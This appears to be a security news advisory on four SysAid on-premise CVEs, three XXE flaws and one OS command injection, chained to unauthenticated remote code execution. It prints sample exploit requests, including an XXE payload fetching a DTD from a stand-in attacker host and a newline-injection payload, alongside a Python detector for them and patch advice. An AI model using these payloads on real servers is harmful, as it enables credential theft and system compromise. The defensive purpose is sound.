SysAid ITSM Platform Vulnerability Enables Pre-Authenticated Remote Code Execution

SysAid, a widely deployed IT Service Management (ITSM) platform, has patched a chain of four critical vulnerabilities in its on-premise software, some of which enable unauthenticated attackers to achieve Remote Code Execution (RCE) with SYSTEM privileges on Windows servers.

The flaws, CVE-2025-2775, CVE-2025-2776 and CVE-2025-2777 (all XML External Entity, or XXE, injections) and CVE-2025-2778 (OS Command Injection), were disclosed by researchers from watchTowr Labs and others, and present a severe risk to organizations running unpatched versions of SysAid.

Technical Details

Product Scope:

  • Affected: SysAid On-Premise (self-hosted) versions ≤ 23.3.40
  • Not affected: SysAid SaaS (cloud-hosted)

Vulnerability Chain:
The attack chain leverages three pre-authenticated XXE vulnerabilities and one post-authentication OS command injection.
Here’s how the attack unfolds:

1. Pre-Auth XXE Vulnerabilities

  • CVE-2025-2775: XXE in /mdm/checkin endpoint.
    The GetMdmMessage#doPost handler parses user-supplied XML without sanitization, allowing attackers to inject external entities via crafted POST requests.
  • CVE-2025-2776: XXE in /mdm/serverurl endpoint.
    Similar to the above, but triggered on a different code path within the same handler.
  • CVE-2025-2777: XXE in /lshw endpoint.
    The LshwAgent#doPost method processes XML input with a SAX parser, again with no input validation, enabling XXE attacks.

Sample Exploit Payload:

POST /mdm/checkin HTTP/1.1
Host: target
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://attacker/external.dtd">
%foo;
]>

This causes the server to fetch and process attacker-controlled DTDs, enabling file disclosure or internal network probing.

2. Credential Disclosure

A key impact of these XXEs is the ability to extract the contents of InitAccount.cmd, a file created during installation that contains the plaintext admin username and password.

This file’s first line holds the credentials, which can be exfiltrated using XXE, granting attackers full admin access.

3. Post-Auth OS Command Injection (CVE-2025-2778)

Once admin credentials are obtained, attackers can exploit a command injection flaw in the API settings update functionality.

By injecting newlines and shell commands into the javaLocation parameter, arbitrary commands are written to a batch file (updateApi.bat), which is later executed by the system.

Exploit Example:

POST /API.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded

updateApi=false&updateApiSettings=true&javaLocation="%0acalc%0a

This would inject and execute the calc command on the server.

4. Full RCE Chain

By chaining these vulnerabilities, an unauthenticated attacker can escalate from external file disclosure to full remote code execution as SYSTEM, the highest privilege on Windows.
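As an added example that is not part of the original article or of SysAid's own code, the following Python request inspector (assumed to run in a reverse proxy or over archived request logs) applies the indicators from sections 1 and 3 above to constructed sample traffic: a DOCTYPE with an external or parameter entity sent to the three XXE endpoints, and a javaLocation value containing newlines or quotes in an updateApiSettings request to /API.jsp. The endpoint and parameter names come from the advisory; the sample requests are constructed.

```python
import re
from urllib.parse import parse_qs

# Sinks named in the advisory: three pre-auth XXE endpoints, one post-auth command injection.
XXE_ENDPOINTS = {"/mdm/checkin", "/mdm/serverurl", "/lshw"}
CMDI_ENDPOINT = "/API.jsp"

# A DOCTYPE declaring an external (SYSTEM/PUBLIC) or parameter entity is the
# signature of the XXE payload above; genuine MDM check-ins carry no DTD at all.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Characters that turn a javaLocation "path" into extra batch-file lines or commands.
BATCH_BREAKERS = "\r\n\"&|"


def inspect_request(method, path, content_type, body):
    """Return findings for one request (empty list when nothing looks suspicious)."""
    findings = []
    if method.upper() != "POST":
        return findings
    route = path.split("?", 1)[0]
    if route in XXE_ENDPOINTS:
        if DOCTYPE_RE.search(body):
            findings.append(f"{route}: DOCTYPE in request body")
        if EXT_ENTITY_RE.search(body):
            findings.append(f"{route}: external/parameter entity declaration (XXE)")
    elif route == CMDI_ENDPOINT and "x-www-form-urlencoded" in content_type:
        params = parse_qs(body, keep_blank_values=True)  # decodes %0a, %22, %5C ...
        if params.get("updateApiSettings", [""])[0].lower() == "true":
            for value in params.get("javaLocation", []):
                if any(c in value for c in BATCH_BREAKERS):
                    findings.append(f"{route}: javaLocation breaks out of updateApi.bat line")
    return findings


def scan(requests):
    """Run inspect_request over (method, path, content_type, body) tuples; keep only hits."""
    return {i: f for i, r in enumerate(requests) if (f := inspect_request(*r))}


# Constructed sample traffic: two benign requests and the two payload shapes from the advisory.
SAMPLE = [
    ("POST", "/mdm/checkin", "application/xml", '<?xml version="1.0"?><checkin><id>42</id></checkin>'),
    ("POST", "/mdm/checkin", "application/xml",
     '<?xml version="1.0" ?><!DOCTYPE foo [<!ENTITY % foo SYSTEM "http://attacker/external.dtd">%foo;]>'),
    ("POST", "/API.jsp", "application/x-www-form-urlencoded",
     "updateApi=false&updateApiSettings=true&javaLocation=C:%5CProgram%20Files%5CJava%5Cbin%5Cjava.exe"),
    ("POST", "/API.jsp", "application/x-www-form-urlencoded",
     'updateApi=false&updateApiSettings=true&javaLocation="%0acalc%0a'),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE).items():
        print(idx, hits)
```

Only requests 1 and 3 are flagged; the benign check-in and the legitimate Java path pass through untouched.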

Risk Factor Table

Vulnerability          | CVE ID        | Attack Vector         | Privileges Required | Impact                      | Exploitability | Risk Level
-----------------------|---------------|-----------------------|---------------------|-----------------------------|----------------|-----------
XXE in /mdm/checkin    | CVE-2025-2775 | Remote (pre-auth)     | None                | File disclosure, SSRF       | Trivial        | Critical
XXE in /mdm/serverurl  | CVE-2025-2776 | Remote (pre-auth)     | None                | File disclosure, SSRF       | Trivial        | Critical
XXE in /lshw           | CVE-2025-2777 | Remote (pre-auth)     | None                | File disclosure, SSRF       | Trivial        | Critical
OS Command Injection   | CVE-2025-2778 | Authenticated (admin) | Admin               | Arbitrary command execution | Trivial        | Critical

Recommendations

  • Immediate Patch: Upgrade SysAid On-Premise to version 24.4.60 b16 or later, which addresses all four vulnerabilities.
  • Credential Audit: Change all admin passwords and review for unauthorized access.
  • Compromise Assessment: Check for indicators of compromise, including suspicious POST requests and unexpected files in the webroot.
  • Restrict Access: Limit external exposure of SysAid servers and enforce network segmentation.

These vulnerabilities underscore the high risk posed by business-critical ITSM platforms like SysAid, especially when exposed to the internet.

The pre-auth nature, trivial exploitability, and potential for complete system compromise make immediate remediation essential for all on-premise SysAid deployments.

The post SysAid ITSM Platform Vulnerability Enables Pre-Authenticated Remote Code Execution appeared first on Cyber Security News.
